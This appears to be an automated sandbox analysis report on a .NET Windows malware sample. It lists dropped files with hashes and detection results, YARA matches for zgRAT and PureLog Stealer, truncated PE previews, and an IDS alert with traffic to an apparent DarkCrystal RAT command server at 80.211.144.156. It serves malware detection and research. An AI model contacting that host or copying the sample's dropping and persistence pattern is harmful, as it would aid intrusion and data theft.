                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):179
                                                                    Entropy (8bit):5.672043643888927
                                                                    Encrypted:false
                                                                    SSDEEP:3:Ni81UbkqhqHRdhmLVJ98bLfY//BnfSKbbH0JpiNqoLSQxqUGJmDnerWk+Zn:Ni81gkayRTmLjq6BnfSKnGTfJmDeakYn
                                                                    MD5:93C4920E840B62339D0B767D35B68CC4
                                                                    SHA1:180EAB4153B0E930D7370CDC8B038053BDE444E0
                                                                    SHA-256:1973030EF21788A2D3A3347D290EFC3F10760DE9CC644CA90CED2EE68DC264CE
                                                                    SHA-512:E54A23437CA29F083F8ED975B7657B79CA081231F912FD1780A09C72EB789B9CA0A2C8EA0EBF1B1CE1F57F857BB24765324108410AB45415AA464775FE86D7B9
                                                                    Malicious:false
                                                                    Preview:OzaGqoADr2p1MXXazp15SGAODXYPcu4xTjJCnMdX7E06KSokG8V4Hp2IyLCTQuk681imNUwnMe8OPEEvsyJdYApnrBNcKJHMd37StCWvMsrnrn2uGQlblGh8L45MGUdCWwuWGvCqcXRqSC6DJdV3iplWW9HzGJp1OpQ53foVO49Oz0qJ71D
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                    Joe Sandbox View:
                                                                    • Filename: K61NUunFJv.exe, Detection: malicious, Browse
                                                                    • Filename: NFnZNaiEGC.exe, Detection: malicious, Browse
                                                                    • Filename: PCf6uF6Pp0.exe, Detection: malicious, Browse
                                                                    • Filename: 4fmxsamrPG.exe, Detection: malicious, Browse
                                                                    • Filename: 4QXC0LSV8t.exe, Detection: malicious, Browse
                                                                    • Filename: webWin.exe, Detection: malicious, Browse
                                                                    • Filename: W1nner client.exe, Detection: malicious, Browse
                                                                    • Filename: htxERaJl1W.exe, Detection: malicious, Browse
                                                                    • Filename: Injector.exe, Detection: malicious, Browse
                                                                    • Filename: WWAHost.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):66
                                                                    Entropy (8bit):5.146148475189603
                                                                    Encrypted:false
                                                                    SSDEEP:3:TWgiJowV8JPbHLUfcb8Yf16s:Cxog81rUfcjfks
                                                                    MD5:08C87485154DEC239BF91AB6768AB292
                                                                    SHA1:5D428D306B666783A620C741D6E2347267D9EF26
                                                                    SHA-256:5D2DD25B2AB87F8B16E6EE8BB78075FA57C5E95C10996C2026BA14AB8F2357AD
                                                                    SHA-512:060B344C487DEB3195021BF424D2C37A46E8E335CF883D8CEF7A600C3B3C7D8445763FC1AE5B64413369CA99ADA56235A33D0F0856BFA2FB03F6C434B604E958
                                                                    Malicious:false
                                                                    Preview:2WUsJn4o07i5gAgslpzyBCqUp3Q5XUxcEoOEUW5srOJzy1YHvBYwN7Czp9CPW9RgKF
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\AppReadiness\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (950), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):950
                                                                    Entropy (8bit):5.910773020858544
                                                                    Encrypted:false
                                                                    SSDEEP:24:d3z9gBlYbQEP8rVG705RJ9IpLfLOipLRQaAUFus836wAo4ZC9mO:d3zqYbQEk15RJ9I1fKiZOU0so62MqmO
                                                                    MD5:10F15971CACB930C68ADC28CEB65C273
                                                                    SHA1:AD055C7085E45C0A5D7AE95F9D10BF658333C0B2
                                                                    SHA-256:CC40F4FF1E5C768C1FACD59C17DF44E159C5705D0E37CF75C629F87D61A1AD38
                                                                    SHA-512:2BDFEFDBE18FFC49A8A57B6A0173D5130CBA5C1D15910182039CC60D3C93D66EEE0B691DF487205F558E015098DF5F6D5AB0331F0C7ED24D28D88004B4866973
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (673), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):673
                                                                    Entropy (8bit):5.883158136382871
                                                                    Encrypted:false
                                                                    SSDEEP:12:Fbvr+ImwOkqYVUlSPI/UHnvwlN4I621fJP3yKpsiEWjopqzoRi:Jvrfm6vn6UHnol421R/e0oc
                                                                    MD5:DF7E720456FC44AB99723A395E2675C8
                                                                    SHA1:E44C40E8DFFC1B23DB40A637168045B7BC9455E5
                                                                    SHA-256:D6EFB58BD65A8FCB417E0BB82819D4E99729C45C300FEF17BA8DE0A1750E26B3
                                                                    SHA-512:3A9B6E78778A95A2566ADC105D73EEFBD97DB2782ACF7D50D392FF3BFD4587E4F5338B13D89E81C6508D167C2BB1BAE7E4EB2CF0EB5C3051D379EC9201ECFB28
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1224
                                                                    Entropy (8bit):4.435108676655666
                                                                    Encrypted:false
                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                    Malicious:false
                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.940104839968216
                                                                    Encrypted:false
                                                                    SSDEEP:48:68prPtxM7Jt8Bs3FJsdcV4MKe27U0vqBHOOulajfqXSfbNtm:LPwPc+Vx9MU0vkocjRzNt
                                                                    MD5:0E8357362DD8B4854B3DFCEA0DEE9B68
                                                                    SHA1:CDA712D4DC639E50C3013A496E4DBC429E0AFDC2
                                                                    SHA-256:31A956D0BB1A0A9EC2A490D02DCE23C669A38A5AAEE30CDE28447CFFA675024B
                                                                    SHA-512:9DCD71336A6C02603BB93C1A83E6EE0DF611DDE051767B24D88209D59ADC6530DDB4078663EE33C8446B9BD8ECC1907F67D3E4FAD89A9A4B0F35FA939BC263D3
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                    Process:C:\Windows\System32\w32tm.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):151
                                                                    Entropy (8bit):4.873342209459248
                                                                    Encrypted:false
                                                                    SSDEEP:3:VLV993J+miJWEoJ8FXt+ScWncnNvpKH+UaNrv:Vx993DEUYZbH+r
                                                                    MD5:D174EEC8ACAA2D947D98D01D04FD5589
                                                                    SHA1:706AEFB85EB63F7CDD55CDC8E6A3463A388609E2
                                                                    SHA-256:B245484228E673A323A4380C71DC829012A362C0420C5165D947D85092B1AD93
                                                                    SHA-512:BBEF9C205AD17DB165524CD6CE15F684DF187166D60C7EE864A98765AAAD25F144356B26DEAD89D3759B4D42AFCCA0683D6FDB38C2ED68776248D96F589EE212
                                                                    Malicious:false
                                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 21/08/2024 05:57:29..05:57:29, error: 0x80072746.05:57:34, error: 0x800705B4.
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.550221219335871
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:jW5TA1J9Z1.exe
                                                                    File size:1'960'448 bytes
                                                                    MD5:910284d590bdf27bbeedbde3f3a2a94d
                                                                    SHA1:6561ef1e4b2521aaf86f03ab791ac5ed6c4af7d0
                                                                    SHA256:6a397c6e1041ad55295c3fe2cf7f795da853004c1a02e1d77c65f0da86ad312e
                                                                    SHA512:aa66c2dca084fc179756d360f91609a433b2e704cc0e19ae05f25749c8c102edf2808a92c088782643ef3ec75fa91768333820e30c3839247ec815d9bf8a8797
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    TLSH:7195AE16B5924E3AC3645B314197063D92D1DB263512FB0F361F61EAAD0BBF18EA21F3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x5e002e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66BC7380 [Wed Aug 14 09:06:08 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1dffe0 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e2000 | 0x320 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e4000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x1de034 | 0x1de200 | 94136cb314763d4abd15d185b96fff82 | False | 0.7830417687908496 | data | 7.553608083833407 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1e2000 | 0x320 | 0x400 | 10a44baa6b63fca2f6945c87c4ae48fb | False | 0.3525390625 | data | 2.6502033736331296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x1e4000 | 0xc | 0x200 | abe07fcf0624957983744d5d2ad2b8ef | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x1e2058 | 0x2c8 | data | | | 0.46207865168539325 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|---|
| 2024-08-21T10:03:04.099115+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49709 | 80 | 192.168.2.7 | 80.211.144.156 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Aug 21, 2024 10:03:21.396337986 CEST4973680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:21.739633083 CEST4973680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:21.744817972 CEST804973680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:21.744889021 CEST4973680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:21.746543884 CEST4973880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:21.751337051 CEST804973880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:21.751408100 CEST4973880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:21.751533985 CEST4973880192.168.2.780.211.144.156
